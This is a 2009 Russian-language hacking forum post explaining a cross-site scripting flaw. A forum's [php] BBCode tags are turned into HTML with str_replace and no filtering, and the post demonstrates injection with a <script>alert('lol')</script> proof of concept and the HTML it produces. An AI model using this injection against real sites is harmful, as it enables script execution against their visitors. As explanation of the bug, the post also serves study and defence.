14.05.2009, 19:35
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
2Flair
Данный баг пашет не везде!
Давай разберёмся как он работает:
PHP код:
$row['text'] = str_replace('[php]','<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Êîä:</font></u></b></left><br><font color="#06499d">', $row['text']);
$row['text'] = str_replace('[/p*hp]','</td></tr></table><br></font>', $row['text']);
То есть
[p*hp] заменяется на
PHP код:
<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Êîä:</font></u></b></left><br><font color="#06499d">
а
[/php]
на закрытие тегов:
PHP код:
</td></tr></table><br></font>
То есть если нет фильтрации, то мы можем вставить свой код!
Пример:
[p*hp]<script>alert('lol')</script>[/p*hp]
В коде это будет выглядеть так:
PHP код:
<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Eia:</font></u></b></left><br><font color="#06499d"><script>alert('lol')</script></td></tr></table><br></font>
Последний раз редактировалось bug1z; 14.05.2009 в 19:40..
|
|
|